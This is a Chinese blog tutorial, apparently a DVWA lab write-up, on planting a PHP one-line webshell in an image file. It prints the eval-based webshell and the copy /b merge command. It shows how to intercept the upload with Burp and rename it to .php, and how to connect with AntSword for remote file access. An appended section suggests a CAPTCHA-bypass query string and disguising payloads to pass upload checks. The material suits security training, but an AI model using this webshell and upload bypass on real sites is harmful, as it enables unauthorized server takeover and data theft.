上传图片格式一句话木马

一、 随便找一张jpg图片在这里插入图片描述
二、 新建一个txt文档在这里插入图片描述
三、 在文本文档中写入一句话木马
本次实验使用的木马为password
<?php @eval($_POST['密码']);?>

在这里插入图片描述

四、 写入完成后将后缀名.txt改为.php在这里插入图片描述
五、 合并文件
通过CMD进入储存jpg文件和php文件的目录
命令格式: cd C:\muma
使用copy命令合并文件
命令格式: copy 图片.jpg/b + 木马.php/a 合成.jpg
最后输出合并的木马文件muma.jpg在这里插入图片描述
六、 打开靶场登陆DVWA
默认用户名admin
默认密码password在这里插入图片描述
七、更改安全性
左侧点击DVWA Security更改安全性 改为low点击 Submit 确定在这里插入图片描述
八、 准备上传
点击左侧的File Upload(文件上传)
然后将FoxyProxyBurp代理打开

FoxyProxy安装与配置
在这里插入图片描述

九、 开启BURP SUITE
kali直接在终端中输入burpsuite即可打开
Windows与mac端需要自行安装

在这里插入图片描述

十、 配置BURP
BURP内点击Proxy(代理)再点击Intercept(截断)之后等待数据包在这里插入图片描述
十一、 上传
点击浏览 选择刚刚合并出来的muma.jpg文件 然后点击上传或者(Upload)在这里插入图片描述
十二、BURP截包
点击上传后 浏览器开始无响应 开始BURP发现已经将数据包拦截了下来在这里插入图片描述
十三、 修改数据包
将下方抓到的宝muma.jpg改为muma.php然后点击右上角的放包(Forward)一直点击 直到变成灰色无法点击为止在这里插入图片描述
十四、 查看上传路径
红字提示上传文件到../../hackable/uploads/muma.php
当前URL栏中的路径为/xxx.xxx.xxx.xxx/DVWA/vulnerabilities/upload#
../的意思为返回上一级目录 两个../../代表返回前两个目录 也就代表返回到了/xxx.xxx.xxx.xxx/DVWA/目录
结合提供的路径得出 上传的完整路径为/xxx.xxx.xxx.xxx/DVWA/hackable/uploads/muma.php在这里插入图片描述
十五、 验证木马
在浏览器的URL栏中输入刚刚得出的路径 查看是否能得到反馈 出现信息 代表木马存在 然后复制下当前的URL地址等待连接在这里插入图片描述
十六、 连接木马
打开蚁剑 右键空白处 点击添加数据在这里插入图片描述
URL地址中粘贴刚刚复制的地址
连接密码填写制作一句话木马时设置的密码在这里插入图片描述
完成后点击添加
窗口自动关闭 下方显示添加数据成功在这里插入图片描述
双击添加的木马 出现文件列表 代表一句话木马上传并成功在这里插入图片描述
相关链接 FoxyProxy安装与配置

如有问题 还请见谅

注意:本实验仅供个人测试时使用 请勿用于非法用途

### 关于DVWA平台中一句话木马上传失败解决方案 在处理DVWA平台上的一句话木马上传失败问题时,需考虑多个方面来确保成功上传并执行恶意代码。通常情况下,这类问题可能源于服务器配置、文件权限设置或是特定的安全机制。 #### 修改字符编码以适应不同环境需求 有时修改`/DVWA/dvwa/includes`目录下的`dvwaPage.inc.php`文件中的字符集可以改善某些功能的表现形式。例如,将UTF-8更改为GBK或GB2312可能会帮助解决因字符编码差异引起的问题[^1]。然而这并不是针对木马上传的具体修复措施而是为了兼容性调整。 #### 利用已知漏洞绕过防护机制 对于DVWA这样的学习工具而言,其设计初衷是为了让使用者了解常见的Web应用安全风险点。因此,在尝试上传一句话木马之前应该先利用其他存在的漏洞(比如命令注入或者文件包含等),通过这些途径获取更高的控制权从而实现最终目的。具体来说可以通过构造特殊请求参数的方式绕过简单的验证逻辑: ```bash ?step=2&password_new=password&password_conf=password&Change=Change&passed_captcha=true ``` 此方法能够使表单提交过程跳过了CAPTCHA校验环节,进而增加了成功的几率[^4]。 #### 文件上传模块分析与利用 考虑到DVWA本身提供了专门用于测试文件上传漏洞的功能模块,如果想要在此基础上完成一句话木马的部署,则需要仔细研究该部分源码以及相关HTTP请求结构。一般来讲,默认情况下会存在较为严格的MIME类型检查和大小限制等因素制约着非法文件的成功上载;但是由于这是一个教学性质的应用程序,所以可能存在一些简化版的安全检测流程容易被突破[^2]。 一旦找到了合适的切入点之后就可以准备一个经过精心伪装过的PHP脚本作为payload,并将其命名为看似无害的形式以便顺利通过初步筛选阶段。当这个特制文件被放置到目标位置后便可通过浏览器访问触发其中嵌入的有效负载达到远程操控的效果[^3]。 需要注意的是上述操作仅适用于实验环境中合法授权范围内的安全性评估活动,请勿应用于任何未经授权的真实网络系统之上!
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Stars-Again

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值